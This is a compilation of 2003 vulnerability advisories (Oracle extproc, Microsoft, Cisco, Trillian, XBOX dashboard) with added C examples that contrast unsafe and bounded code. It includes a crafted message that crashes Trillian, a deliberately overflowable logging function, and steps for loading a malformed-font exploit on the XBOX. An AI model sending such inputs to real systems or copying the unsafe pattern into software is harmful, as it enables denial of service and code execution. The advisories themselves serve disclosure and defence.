   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Access     |12.2(8)JA, 12.2(11)JA|
   |Point AP1200 series |                     |
   |--------------------+---------------------|
   |Cisco Aironet       |                     |
   |Wireless Bridge     |12.2(11)JA           |
   |AP1400 series       |                     |
   +------------------------------------------+

   All previous VxWorks-based software releases for Cisco Aironet Access
   Point 1200 are not affected. That includes the following, and earlier,
   software releases: 11.56, 12.01T1, 12.02T1, 12.03T.

Patches

http://www.cisco.com/tacpage/sw-center/sw-wireless.shtml



Oracle Extproc Buffer Overflow

2003-07-25

Risk level: high

Type: Buffer overflow

Source of info: NGSSoftware Insight Security

Impact

Oracle's RDBMS, a leading database server package, supports stored packages
and procedures through the use of PL/SQL. These packages and procedures can
be extended by allowing calls to be made to operating system libraries. Any
library loaded in this way is done so by a process external to the main
RDBMS, namely extproc. Extproc is vulnerable to a classic stack based buffer
overflow. This can be exploited remotely by an attacker. No user ID or
password is necessary.

Overview

Description
***********
Oracle's RDBMS, a leading database server package, supports stored packages
and procedures through the use of PL/SQL. These packages and procedures can
be extended by allowing calls to be made to operating system libraries. Any
library loaded in this way is done so by a process external to the main
RDBMS, namely extproc. Extproc is vulnerable to a classic stack based buffer
overflow. This can be exploited remotely by an attacker. No user ID or
password is necessary.

Details
*******
Previously, NGSSoftware discovered a vulnerability in the Oracle package
that allowed an attacker to force extproc to load any operating system
library and execute any function. This attack did not require a user ID or
password. Oracle took steps to resolve this security hole. By way of fixing
the vulnerability, attempts to load libraries would be logged but denied
unless the call came from the local machine. Remote attempts would be logged
as just stated. However, this logging process is vulnerable to a classic
stack based buffer overflow vulnerability. By supplying an overly long
library name a stack based buffer is overflowed, overwriting the saved
return address on the stack. When the vulnerable procedure returns control
over the process' path of execution can be gained. As this does not require
a user ID or password it must be stressed that this is a critical
vulnerability. On Windows platforms Oracle typically runs in the security
context of the LOCAL SYSTEM account and, as such, allows for a complete
compromise of the server. On Unix-based systems extproc runs as the 'Oracle'
user. As the 'Oracle' user typically is the owner of the software binaries
and data files, an attacker exploiting this can completely subvert the
integrity of the database software and data.
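The advisory describes an attacker-controlled library name being copied into a fixed-size stack buffer while extproc builds its "denied" log line. The following is an added example (not Oracle's code and not from the NGSSoftware advisory) that puts that unsafe shape beside a bounded version; buffer sizes, the length policy, the log wording and the sample peer address are assumptions.

```c
/* Added example: unbounded vs. bounded construction of an audit line that
 * embeds a caller-supplied library name. Not Oracle's or NGSSoftware's code. */
#include <stdio.h>
#include <string.h>

#define LOG_LINE_MAX 256   /* assumed size of the stack buffer */
#define LIBNAME_MAX  128   /* assumed policy limit for a library path */

enum log_status {
    LOG_OK = 0,
    LOG_REJECTED_LENGTH = -1,   /* name longer than LIBNAME_MAX */
    LOG_REJECTED_CHARS  = -2,   /* name contains control characters */
    LOG_TRUNCATED       = -3    /* caller's output buffer was too small */
};

/* The unsafe shape: the name is appended to a fixed stack buffer with no
 * length check, so a name longer than the buffer overwrites whatever follows
 * it on the stack. Shown for comparison only; never call it with untrusted
 * input. */
void log_denied_unsafe(const char *peer, const char *libname, char *out)
{
    char line[LOG_LINE_MAX];
    strcpy(line, "extproc: denied remote load from ");
    strcat(line, peer);
    strcat(line, ": ");
    strcat(line, libname);       /* overflows 'line' when libname is long */
    strcpy(out, line);
}

/* The bounded version. Every write goes through snprintf with the real
 * buffer size, over-long names are reported by length only (their content
 * never reaches the log), and control characters are refused so the log
 * cannot be fed forged line breaks. Returns an enum log_status value. */
int format_denied_load(const char *peer, const char *libname,
                       char *out, size_t outsz)
{
    int w;
    size_t n = 0;

    /* Bounded length scan: stop as soon as the limit is exceeded. */
    while (n <= LIBNAME_MAX && libname[n] != '\0')
        n++;

    if (n > LIBNAME_MAX) {
        w = snprintf(out, outsz,
                     "extproc: denied load from %s: library name too long "
                     "(>%d bytes)", peer, LIBNAME_MAX);
        return (w < 0 || (size_t)w >= outsz) ? LOG_TRUNCATED
                                             : LOG_REJECTED_LENGTH;
    }

    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)libname[i];
        if (c < 0x20 || c == 0x7f) {
            w = snprintf(out, outsz,
                         "extproc: denied load from %s: library name "
                         "contains control characters", peer);
            return (w < 0 || (size_t)w >= outsz) ? LOG_TRUNCATED
                                                 : LOG_REJECTED_CHARS;
        }
    }

    w = snprintf(out, outsz, "extproc: denied load from %s: %s", peer, libname);
    if (w < 0 || (size_t)w >= outsz)
        return LOG_TRUNCATED;
    return LOG_OK;
}

int main(void)
{
    char out[LOG_LINE_MAX];
    char longname[2048];

    /* Constructed inputs: a benign name and an over-long one. */
    memset(longname, 'A', sizeof longname - 1);
    longname[sizeof longname - 1] = '\0';

    format_denied_load("10.0.0.5", "/usr/lib/libfoo.so", out, sizeof out);
    puts(out);
    format_denied_load("10.0.0.5", longname, out, sizeof out);
    puts(out);
    return 0;
}
```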

Fix Information
***************
NGSSoftware alerted Oracle to this vulnerability on 30th September 2002.
Oracle has reviewed the code and created a patch which is available from:

http://otn.oracle.com/deploy/security/pdf/2003alert57.pdf

NGSSoftware advise Oracle database customers to review and install the patch
as a matter of urgency.

A check for this issue already exists in NGSSQuirreL for Oracle, a
comprehensive automated vulnerability assessment tool for Oracle Database
Servers of which more information is available from the NGSSite.

http://www.nextgenss.com/products/squirrelfororacle.htm

It is further recommended that Oracle DBAs have their network/firewall
administrators ensure that the database server is protected from Internet
sourced traffic.


About NGSSoftware
*****************
NGSSoftware design, research and develop intelligent, advanced application
security assessment scanners. Based in the United Kingdom, NGSSoftware have
offices in the South of London and the East Coast of Scotland. NGSSoftware's
sister company NGSConsulting, offers best of breed security consulting
services, specialising in application, host and network security
assessments.

Patches

http://metalink.oracle.com/



Flaw in Windows Function Could Allow Denial of Service

2003-07-23

Risk level: Moderate

Type: DoS

Source of info: Microsoft Security Team

Impact

A flaw exists in a Windows NT 4.0 Server file management function 
that can cause a denial of service vulnerability. The flaw results 
because the affected function can cause memory that it does not own 
to be freed when a specially crafted request is passed to it.

Overview

A flaw exists in a Windows NT 4.0 Server file management function 
that can cause a denial of service vulnerability. The flaw results 
because the affected function can cause memory that it does not own 
to be freed when a specially crafted request is passed to it. If 
the application making the request to the function does not carry 
out any user input validation and allows the specially crafted 
request to be passed to the function, the function may free memory 
that it does not own. As a result, the application passing the 
request could fail. 

By default, the affected function is not accessible remotely, 
however applications installed on the operating system that are 
available remotely may make use of the affected function. 
Application servers or Web servers are two such applications that 
may access the function. Note that Internet Information Server 4.0 
(IIS 4.0) does not, by default, make use of the affected function.

Mitigating Factors:
- The default installation of Windows NT 4.0 Server is not 
vulnerable to a remote denial of service. Additional software that 
makes use of the affected file management function must be 
installed on the system to expose the vulnerability remotely.
- If the application calling the affected file management function 
carries out input validation, the specially crafted request may not 
be passed to the vulnerable function.
- The vulnerability cannot be used to cause Windows NT 4.0 Server 
itself to fail. Only the application that makes the request may 
fail.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-029.asp
http://www.microsoft.com/security/security_bulletins/ms03-029.asp



Unchecked Buffer in DirectX Could Enable System Compromise

2003-07-23

Risk level: Critical

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

This vulnerability allows an attacker to execute code on a user's system. 

Overview

DirectX consists of a set of low-level Application Programming 
Interfaces (APIs) that are used by Windows programs for multimedia 
support. Within DirectX, the DirectShow technology performs client-
side audio and video sourcing, manipulation, and rendering. 

There are two buffer overruns with identical effects in the 
function used by DirectShow to check parameters in a Musical 
Instrument Digital Interface (MIDI) file. A security vulnerability 
results because it would be possible for a malicious user to 
attempt to exploit these flaws and execute code in the security 
context of the logged-on user. 

An attacker could seek to exploit this vulnerability by creating a 
specially crafted MIDI file designed to exploit this vulnerability 
and then host it on a Web site or on a network share, or send it by 
using an HTML-based e-mail. In the case where the file was hosted 
on a Web site or network share, the user would need to open the 
specially crafted file. If the file was embedded in a page the 
vulnerability could be exploited when a user visited the Web page. 
In the HTML-based e-mail case, the vulnerability could be exploited 
when a user opened or previewed the HTML-based e-mail. A successful 
attack could cause DirectShow, or an application making use of 
DirectShow, to fail. A successful attack could also cause an 
attacker's code to run on the user's computer in the security 
context of the user. 

Mitigating Factors:
====================
- By default, Internet Explorer on Windows Server 2003 runs in 
Enhanced Security Configuration. This default configuration of 
Internet Explorer blocks the e-mail-based vector of this attack 
because Microsoft Outlook Express running on Windows Server 2003 by 
default reads e-mail in plain text. If Internet Explorer Enhanced 
Security Configuration were disabled, the protections put in place 
that prevent this vulnerability from being exploited would be 
removed.
- In the Web-based attack scenario, the attacker would have to host 
a Web site that contained a Web page used to exploit these 
vulnerabilities. An attacker would have no way to force users to 
visit a malicious Web site outside the HTML-based e-mail vector. 
Instead, the attacker would need to lure them there, typically by 
getting them to click a link that would take them to the attacker's 
site. 
- The combination of the above means that on Windows Server 2003 an 
administrator browsing only to trusted sites should be safe from 
this vulnerability.
- Code executed on the system would only run under the privileges 
of the logged-on user.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-030.asp
http://www.microsoft.com/security/security_bulletins/ms03-030.asp



Cumulative Patch for Microsoft SQL Server

2003-07-23

Risk level: Important

Type: many types

Source of info: Microsoft Security Team

Impact

This is a cumulative patch that includes the functionality of all
previously released patches for SQL Server 7.0, SQL Server 2000, MSDE
1.0, and MSDE 2000. In addition, it eliminates three newly discovered
vulnerabilities. 

Overview

This is a cumulative patch that includes the functionality of all
previously released patches for SQL Server 7.0, SQL Server 2000, MSDE
1.0, and MSDE 2000. In addition, it eliminates three newly discovered
vulnerabilities. 

 - Named Pipe Hijacking - 
Upon system startup, SQL Server creates and listens on a specific
named pipe for incoming connections to the server. A named pipe is a
specifically named one-way or two-way channel for communication
between a pipe server and one or more pipe clients. The named pipe is
checked for verification of which connection attempts can log on to
the system running SQL Server to execute queries against data that is
stored on the server.

A flaw exists in the checking method for the named pipe that could
allow an attacker local to the system running SQL Server to hijack
(gain control of) the named pipe during another client's
authenticated logon password. This would allow the attacker to gain
control of the named pipe at the same permission level as the user
who is attempting to connect. If the user who is attempting to
connect remotely has a higher level of permissions than the attacker,
the attacker will assume those rights when the named pipe is
compromised.

 - Named Pipe Denial of Service - 
In the same named pipes scenario that is mentioned in the "Named Pipe
Hijacking" section of this bulletin, it is possible for an
unauthenticated user who is local to the intranet to send a very
large packet to a specific named pipe on which the system running SQL
Server is listening and cause it to become unresponsive.
 
This vulnerability would not allow an attacker to run arbitrary code
or elevate their permissions, but it may still be possible for a
denial of service condition to exist that would require that the
server be restarted to restore functionality.

 - SQL Server Buffer Overrun - 
A flaw exists in a specific Windows function that may allow an
authenticated user (with direct access to log on to the system running
SQL Server) to create a specially crafted packet that, when
sent to the listening local procedure call (LPC) port of the system,
could cause a buffer overrun. 
If successfully exploited, this could allow a user with limited
permissions on the system to elevate their permissions to the level
of the SQL Server service account, or cause arbitrary code to run.

Mitigating Factors:
====================
Named Pipe Hijacking:
 - To exploit this flaw, the attacker would need to be an
   authenticated user local to the system.
 - This vulnerability provides no way for an attacker to remotely
   usurp control over the named pipe.

Named Pipe Denial of Service:
 - Although it is unnecessary that the attacker be authenticated,
   to exploit this flaw the attacker would require access to the 
   local intranet. 
 - Restarting the SQL Server Service will reinstate normal
   operations.
 - This flaw provides no method by which an attacker can gain 
   access to the system or information contained in the database. 

SQL Server Buffer Overrun:
 - To exploit this flaw, the attacker would need to be an
   authenticated user local to the system.
 - This vulnerability cannot be remotely exploited.

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-031.asp
http://www.microsoft.com/security/security_bulletins/ms03-031.asp



Critical security vulnerability in Microsoft Operating Systems

2003-07-17

Risk level: high

Type: Buffer overflow

Source of info: LSD

Impact

LSD has discovered a critical security vulnerability in all recent versions of
Microsoft operating systems. The vulnerability affects default installations
of Windows NT 4.0, Windows 2000, Windows XP as well as Windows 2003 Server.

Overview

This is a buffer overflow vulnerability that exists in an integral component of
any Windows operating system, the RPC interface implementing Distributed Component
Object Model services (DCOM). As a result of an implementation error in a function
responsible for instantiation of DCOM objects, remote attackers can obtain
unauthorized access to vulnerable systems.

The existence of the vulnerability has been confirmed by Microsoft Corporation.
The appropriate security bulletin as well as fixes for all affected platforms
are available for download from http://www.microsoft.com/security/ (MS03-026).

It should be emphasized that this vulnerability poses an enormous threat and
appropriate patches provided by Microsoft should be immediately applied.

Patches

http://www.microsoft.com/security/



Cisco IOS Interface Blocked by IPv4 Packet

2003-07-17

Risk level: high

Type: DoS

Source of info: Cisco Systems

Impact

Cisco routers and switches running Cisco IOS® software and configured to
process Internet Protocol version 4 (IPv4) packets are vulnerable to a
Denial of Service (DoS) attack. A rare sequence of crafted IPv4 packets
sent directly to the device may cause the input interface to stop
processing traffic once the input queue is full. No authentication is
required to process the inbound packet. Processing of IPv4 packets is
enabled by default. Devices running only IP version 6 (IPv6) are not
affected. A workaround is available.

Cisco has made software available, free of charge, to correct the problem.

Overview

Summary
=======

Cisco routers and switches running Cisco IOS® software and configured to
process Internet Protocol version 4 (IPv4) packets are vulnerable to a
Denial of Service (DoS) attack. A rare sequence of crafted IPv4 packets
sent directly to the device may cause the input interface to stop
processing traffic once the input queue is full. No authentication is
required to process the inbound packet. Processing of IPv4 packets is
enabled by default. Devices running only IP version 6 (IPv6) are not
affected. A workaround is available.

Cisco has made software available, free of charge, to correct the problem.

This advisory is available at 
http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml.

Affected Products
=================

This issue affects all Cisco devices running Cisco IOS software and
configured to process Internet Protocol version 4 (IPv4) packets. Cisco
devices which do not run Cisco IOS software are not affected. Devices which
run only Internet Protocol version 6 (IPv6) are not affected.

Details
=======

Cisco routers are configured to process and accept Internet Protocol
version 4 (IPv4) packets by default. A rare, specially crafted sequence of
IPv4 packets which is handled by the processor on a Cisco IOS device may
force the device to incorrectly flag the input queue on an interface as
full, which will cause the router to stop processing inbound traffic on
that interface. This can cause routing protocols to drop due to dead
timers.

On Ethernet interfaces, Address Resolution Protocol (ARP) times out after a
default time of four hours, and no traffic can be processed. The device
must be rebooted to clear the input queue on the interface, and will not
reload without user intervention. The attack may be repeated on all
interfaces causing the router to be remotely inaccessible. A workaround is
available, and is documented in the Workarounds section.

The following two Cisco vulnerabilities are documented in DDTS. CSCea02355
(registered customers only) affects all Cisco routers running Cisco IOS
software. CSCdz71127 (registered customers only) was introduced by an
earlier code revision. Any version of software which has the fix for 
CSCdx02283 (registered customers only) is vulnerable.

Registered customers can find more details using the Bug Toolkit at 
http://www.cisco.com/cgi-bin/Support/Bugtool/launch_bugtool.pl (registered
customers only).

To identify a blocked input interface, use the show interfaces command and
look for the Input Queue line. If the current size (in this case, 76) is
larger than the maximum size (75), the input queue is blocked.
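The check in the previous paragraph, as an added example that is not part of the Cisco advisory: a small C parser that scans captured `show interfaces` text for the Input queue line of each interface and flags any whose current size exceeds its maximum. The sample output is constructed; the `size/max/drops/flushes` field order on that line is the one assumed here.

```c
/* Added example: detect a blocked input queue in saved "show interfaces"
 * output. Not Cisco's code; the SAMPLE text below is constructed. */
#include <stdio.h>
#include <string.h>

#define MAX_IFACE 16
#define NAME_LEN  64

struct iface_status {
    char name[NAME_LEN];
    int  size;      /* current input queue depth */
    int  max;       /* configured maximum (hold-queue in) */
    int  blocked;   /* 1 when size > max: the symptom the advisory describes */
};

/* Walks the text line by line. A non-indented line containing " is " starts
 * a new interface ("Serial0/0 is up, line protocol is up"); an indented
 * "Input queue: a/b/c/d (size/max/drops/flushes)" line is attributed to the
 * most recent interface. Returns the number of interfaces recorded. */
int parse_show_interfaces(const char *text, struct iface_status *out, int maxout)
{
    int count = 0;
    char cur[NAME_LEN] = "";
    const char *line = text;

    while (*line) {
        const char *nl = strchr(line, '\n');
        size_t len = nl ? (size_t)(nl - line) : strlen(line);
        char buf[256];

        if (len >= sizeof buf)
            len = sizeof buf - 1;
        memcpy(buf, line, len);
        buf[len] = '\0';

        if (buf[0] != ' ' && buf[0] != '\0' && strstr(buf, " is ")) {
            /* Interface header: the name is the first token. */
            size_t n = strcspn(buf, " ");
            if (n >= NAME_LEN)
                n = NAME_LEN - 1;
            memcpy(cur, buf, n);
            cur[n] = '\0';
        } else if (cur[0]) {
            const char *q = strstr(buf, "Input queue:");
            int size, max, drops, flushes;
            if (q && sscanf(q, "Input queue: %d/%d/%d/%d",
                            &size, &max, &drops, &flushes) == 4) {
                if (count >= maxout)
                    return count;
                snprintf(out[count].name, NAME_LEN, "%s", cur);
                out[count].size    = size;
                out[count].max     = max;
                out[count].blocked = size > max;
                count++;
            }
        }
        if (!nl)
            break;
        line = nl + 1;
    }
    return count;
}

/* Number of interfaces in 'text' whose input queue is wedged. */
int count_blocked(const char *text)
{
    struct iface_status st[MAX_IFACE];
    int n = parse_show_interfaces(text, st, MAX_IFACE);
    int blocked = 0;
    for (int i = 0; i < n; i++)
        blocked += st[i].blocked;
    return blocked;
}

/* Constructed sample: one healthy interface and one showing 76/75. */
const char SAMPLE[] =
    "Ethernet0/0 is up, line protocol is up\n"
    "  Hardware is AmdP2, address is 0000.0c12.3456 (bia 0000.0c12.3456)\n"
    "  Input queue: 0/75/0/0 (size/max/drops/flushes); Total output drops: 0\n"
    "Serial0/0 is up, line protocol is up\n"
    "  Hardware is PowerQUICC Serial\n"
    "  Input queue: 76/75/0/0 (size/max/drops/flushes); Total output drops: 0\n";

int main(void)
{
    struct iface_status st[MAX_IFACE];
    int n = parse_show_interfaces(SAMPLE, st, MAX_IFACE);
    for (int i = 0; i < n; i++)
        printf("%-12s input queue %d/%d %s\n", st[i].name, st[i].size,
               st[i].max, st[i].blocked ? "BLOCKED" : "ok");
    return count_blocked(SAMPLE) ? 1 : 0;
}
```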

Impact
======

A device receiving these specifically crafted IPv4 packets will force the
inbound interface to stop processing traffic. The device may stop
processing packets destined to the router, including routing protocol
packets and ARP packets. No alarms will be triggered, nor will the router
reload to correct itself. This issue can affect all Cisco devices running
Cisco IOS software. This vulnerability may be exercised repeatedly
resulting in loss of availability until a workaround has been applied or
the device has been upgraded to a fixed version of code.

Software Versions and Fixes
===========================

Each row of the table describes a release train and the platforms or
products for which it is intended. If a given release train is vulnerable,
then the earliest possible releases that contain the fix and the
anticipated date of availability for each are listed in the Rebuild,
Interim, and Maintenance columns. In some cases, no rebuild of a particular
release is planned; this is marked with the label "Not scheduled." A device
running any release in the given train that is earlier than the release in
a specific column (less than the earliest fixed release) is known to be
vulnerable, and it should be upgraded at least to the indicated release or
a later version (greater than the earliest fixed release label).

When selecting a release, keep in mind the following definitions:

  * Maintenance
   
    Most heavily tested and highly recommended release of any label in a
    given row of the table.
   
  * Rebuild
   
    Constructed from the previous maintenance or major release in the same
    train, it contains the fix for a specific vulnerability. Although it
    receives less testing, it contains only the minimal changes necessary
    to effect the repair. Cisco has made available several rebuilds of
    mainline trains to address this vulnerability, but strongly recommends
    running only the latest maintenance release on mainline trains.
   
  * Interim
   
    Built at regular intervals between maintenance releases and receives
    less testing. Interims should be selected only if there is no other
    suitable release that addresses the vulnerability, and interim images
    should be upgraded to the next available maintenance release as soon as
    possible. Interim releases are not available through manufacturing, and
    usually they are not available for customer download from CCO without
    prior arrangement with the Cisco Technical Assistance Center (TAC).
   
In all cases, customers should exercise caution to be certain the devices
to be upgraded contain sufficient memory and that current hardware and
software configurations will continue to be supported properly by the new
release. If the information is not clear, contact the Cisco TAC for
assistance.

Patches

http://www.cisco.com/tacpage/sw-center/sw-ios.html



Flaw in ISA Server Error Pages Could Allow Cross-Site Scripting Attack (816456)

2003-07-16

Risk level: Important

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

ISA Server contains a number of HTML-based error pages that allow 
the server to respond to a client requesting a Web resource with 
a customized error. A cross-site scripting vulnerability exists 
in many of these error pages that are returned by ISA Server 
under specific error conditions.

Overview

To exploit this flaw, an attacker would have to first be aware of 
a specific ISA server and its access policies or host an ISA 
server of their own and create specific access policies designed 
to exploit this vulnerability. The attacker could then craft a 
request to trigger a page refusal. Once the attack was crafted, 
the attacker would have to host a Web site containing the link, 
or send the link to the user in the form of an HTML e-mail. After 
the user previewed or opened the e-mail, the malicious site could 
be visited automatically without further user interaction. In the 
Web-based attack scenario, an attacker would have no way to force 
a user to visit the Web site. 

Mitigating factors: 
====================

 - The vulnerability could only be exploited if the attacker 
could entice another user into visiting a Web page and clicking a 
link on it, or opening an HTML-based e-mail.
 
 - The request must be one that would cause the ISA server to 
respond with one of several affected error pages. 

 - The vulnerability would not normally enable an attacker to 
gain any privileges on an affected ISA Server computer, breach 
the firewall, or compromise any cached content, unless the user 
is operating on the ISA server itself and is using the Web Proxy 
service to access the Internet. 

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-028.asp
http://www.microsoft.com/security/security_bulletins/ms03-028.asp



Unchecked Buffer in Windows Shell Could Enable System Compromise

2003-07-16

Risk level: high

Type: Buffer overflow

Source of info: Microsoft Security Team

Impact

It is possible to run code of attacker's choice.

Overview

The Windows shell is responsible for providing the basic 
framework of the Windows user interface experience. It is most 
familiar to users as the Windows desktop. It also provides a 
variety of other functions to help define the user's computing 
session, including organizing files and folders, and providing 
the means to start programs. 

An unchecked buffer exists in one of the functions used by the 
Windows shell to extract custom attribute information from 
certain folders. A security vulnerability results because it is 
possible for a malicious user to construct an attack that could 
exploit this flaw and execute code on the user's system. 

An attacker could seek to exploit this vulnerability by creating 
a Desktop.ini file that contains a corrupt custom attribute, and 
then host it on a network share. If a user were to browse the 
shared folder where the file was stored, the vulnerability could 
then be exploited. A successful attack could have the effect of 
either causing the Windows shell to fail, or causing an 
attacker's code to run on the user's computer in the security 
context of the user. 

Mitigating factors:

 - In the case where an attacker's code was executed, the code 
would run in the security context of the user. As a result, any 
limitations on the user's ability would also restrict the actions 
that an attacker's code could take. 

 - An attacker could only seek to exploit this vulnerability by 
hosting a malicious file on a share. 

 - This vulnerability only affects Windows XP Service Pack 1. 
Users running Windows XP Gold are not affected. 

Patches

http://www.microsoft.com/technet/security/bulletin/ms03-027.asp
http://www.microsoft.com/security/security_bulletins/ms03-027.asp
   



Trillian Remote DoS

2003-07-05

Risk level: high

Type: DoS

Source of info: FLUR

Impact

It is possible to crash Trillian by sending a corrupt 'TypingUser' message. Replacing any of the characters in 'TypingUser' will cause Trillian to crash. If more than 10 characters are used, or if the colon is omitted, Trillian will not crash. The crash occurs due to a function within msn.dll for both Trillian 1 and 0.74. This may be exploitable further.

Overview

In order to exploit this condition, no code is necessary: simply hex edit a messenger client, replacing the string 'TypingUser' with any other string of the same length (or simply changing a letter or two). However, this method of exploitation does break Microsoft's EULA/TOS, and you are not encouraged to utilize a broken client in this way except in an educational context. This 'hack' also prevents other non-Trillian Messenger clients from detecting when a user is typing.

Crash Summary:

MOV ECX,DWORD PTR DS:[EDX]  ; EDX is uninitialized

The crash looks something like this:

Instruction at 0x####8826 referenced memory at 0x00000000

Sample TCP session to crash Trillian:

MIME-Version: 1.0
Content-Type: text/x-msmsgscontrol
TypingXxxx: attacker@blah.com

Our preliminary tests showed that memory was not manipulable, and thus this bug is not exploitable further than DoS. Please make further research public if you discover otherwise. 



XBOX Dashboard local vulnerability

2003-07-04

Risk level: high

Type: Buffer overflow

Source of info: XBOX security

Impact

 The XBOX Dashboard is what appears when you turn the XBOX on without a 
   disc in the DVD drive. It will let you adjust system settings, manage
   your save games, play and rip audio CDs and configure your XBOX Live
   account. It is the heart of the XBOX and its most vulnerable point, 
   because it lacks several security restrictions which are enforced on 
   games. This includes the lack of the reboot-on-eject-button "feature",
   which is obligatory for all games.
   
   The existence of an exploitable vulnerability within the dashboard could
   totally compromise the XBOX security system. It will make the box 
   independent from Microsoft signed code and therefore this information is
   released to the public now on the 4th of July 2003, the day of the XBOX
   Independence.
   

Overview

Details:
   
   Microsoft knows that a vulnerability within the XBOX dashboard could 
   have serious impact. This is underlined by the fact that the dashboard 
   checks most of its files against an internal stored SHA1 hash value 
   before it uses them. 
   
   For an unknown reason this check is not performed on the audio (.wav) 
   and font (.xtf) files. Unfortunately for Microsoft there exists an 
   exploitable integer underflow vulnerability within the font file loader
   which can be exploited with a malformed font file. When the XTF header 
   is processed the dashboard reads a 4 byte blocksize field from the font
   file. This is expected to represent the size of some datablock including
   the 4 bytes of the size field itself. The blocksize is then allocated 
   and the sizefield is copied into the beginning of the buffer. This is 
   already a possible overflow bug when the field contains the values 0..3.
   Due to memory alignment this is not exploitable. But then the blocksize
   is decreased by 4 because the dashboard wants to read the rest of the 
   block into memory. Obviously values of 0..3 will underflow when 
   decreased by 4 and this results in the dashboard wanting to read up to 
   ~4 gigabytes of data from the font file into e.g. a 3 byte buffer.
   
   Because the XBOX malloc()/free() implementation is also storing control 
   information in-band and is similar to the Windows 2000/XP heap 
   allocators this bug is exploitable and allows execution of arbitrary 
   code. The attached proof of concept code shows that exploiting is 
   possible with offsets that are equal on all dashboards and XBOX versions
   known.
   
   BTW: the dashboard loads its font files directly after the XBOX start 
        animation. This means the exploit does not need any user 
        interaction and when the code is executed only part of the 
        dashboard background is on screen.
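The blocksize arithmetic described above, as an added example (not the dashboard's code and not the advisory's proof of concept): one function reproduces the unsigned wrap-around for blocksizes 0..3 without touching memory, and a hardened reader shows the two checks that prevent it. The XTF layout is simplified to "a 4-byte little-endian blocksize that counts itself, followed by the block data"; that layout and the constructed inputs are assumptions.

```c
/* Added example: the font-block length underflow and a checked reader.
 * Not Microsoft's code; the block layout is a simplified assumption. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum block_result {
    BLK_OK        =  0,
    BLK_TOO_SHORT = -1,   /* file shorter than the 4-byte size field */
    BLK_BAD_SIZE  = -2,   /* blocksize < 4 cannot include its own field */
    BLK_TRUNCATED = -3,   /* block claims more bytes than the file holds */
    BLK_OOM       = -4
};

static uint32_t le32(const uint8_t *p)
{
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* What the unchecked loader computes as "bytes still to read" after it has
 * copied the size field: blocksize - 4 in 32-bit unsigned arithmetic. For
 * 0..3 this wraps to just under 4 GB, which is the bug the advisory
 * describes. Pure arithmetic, no memory is allocated or read here. */
uint32_t unchecked_remaining(uint32_t blocksize)
{
    return blocksize - 4u;
}

/* Hardened reader. On BLK_OK, *out receives a malloc'd copy of the whole
 * block (size field included) and *outlen its length; the caller frees it.
 * On any error *out is NULL and nothing has been allocated. */
int read_font_block(const uint8_t *file, size_t filelen,
                    uint8_t **out, uint32_t *outlen)
{
    *out = NULL;
    *outlen = 0;

    if (filelen < 4)
        return BLK_TOO_SHORT;

    uint32_t blocksize = le32(file);

    /* Check 1: the count must at least cover its own 4 bytes, otherwise
     * the subtraction below would wrap. */
    if (blocksize < 4)
        return BLK_BAD_SIZE;

    uint32_t remaining = blocksize - 4;   /* safe after check 1 */

    /* Check 2: the declared block must fit in what the file actually has. */
    if ((size_t)remaining > filelen - 4)
        return BLK_TRUNCATED;

    uint8_t *buf = malloc(blocksize);
    if (!buf)
        return BLK_OOM;

    memcpy(buf, file, 4);                 /* the size field itself */
    memcpy(buf + 4, file + 4, remaining); /* the rest of the block */
    *out = buf;
    *outlen = blocksize;
    return BLK_OK;
}

int main(void)
{
    /* Constructed files: blocksize 3 (underflows), 6 (valid), 16 (too long). */
    const uint8_t bad[]   = { 0x03, 0x00, 0x00, 0x00, 'A', 'B' };
    const uint8_t good[]  = { 0x06, 0x00, 0x00, 0x00, 'A', 'B' };
    const uint8_t trunc[] = { 0x10, 0x00, 0x00, 0x00, 'A', 'B' };
    uint8_t *blk;
    uint32_t len;

    printf("unchecked remaining for blocksize 3: %u bytes\n",
           unchecked_remaining(3));
    printf("bad   -> %d\n", read_font_block(bad, sizeof bad, &blk, &len));
    printf("good  -> %d (len %u)\n",
           read_font_block(good, sizeof good, &blk, &len), len);
    free(blk);
    printf("trunc -> %d\n", read_font_block(trunc, sizeof trunc, &blk, &len));
    return 0;
}
```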
   

Proof of Concept:

   Attached you will find a proof of concept exploit which will start 
   linux. To install it you have to rename the 2 XBOX font files within the
   font directory of the dashboard partition and then copy ernie.xtf and 
   bert.xtf into this directory. (If you have an XBOX with an older 
   dashboard the font directory does not exist and you must do the renaming
   and file adding work in the main directory). Once the new fonts are in 
   place you copy the default.xbe (which is a copy of xbeboot) into the 
   main directory and add your favourite linux to it.
   

Trustworthy Computing:

   Trustworthy Computing at its best. Nearly 2 years ago I reported an SSL 
   vulnerability within IE to Microsoft. 1 month later I released 
   information about this bug to the public because MS did absolutely 
   nothing. The vulnerability was nearly forgotten; it only exists on the 
   list of 19 unpatched IE vulnerabilities any more. But this is wrong: the
   vulnerability was indeed fixed with one of the many IE patches in the 
   middle of last year. Well, is secretly fixing bugs without an official 
   advisory trustworthy?



Conectiva Security Announcement - updates for the Samsung ML-85G and QL85G printer drivers (ml85p)

2003-07-04

Risk level: high

Type: insecure temporary file

Source of info: Conectiva Security Team

Impact

 ml85p is a SUID root program and it creates temporary files
 in an insecure way, which makes it vulnerable to a race condition
 exploit. A local attacker could easily guess the name of this file
 and create a symbolic link to anywhere on the system. If the target
 exists, it will be overwritten; otherwise, it will be created with
 0666 permissions (world writable).

Overview

 ml85p[1] is a printer driver for the Samsung ML-85G and QL85G printer
 models.
 
 iDEFENSE published[2] the following vulnerabilities in some printer
 related packages, including ml85p:
 
 - mtink: this package is not distributed with Conectiva Linux;
 
 - escputil: the escputil program has a buffer overflow vulnerability
 in the way it deals with a printer name. Long enough names can be
 used to execute arbitrary code or crash the program. In Conectiva
 Linux, escputil is NOT a SGID program, so it is not possible to
 obtain higher privileges by exploiting this problem, but we are
 nevertheless including a fix with this update.
 
 - ml85p: this is a SUID root program and it creates temporary files
 in an insecure way, which makes it vulnerable to a race condition
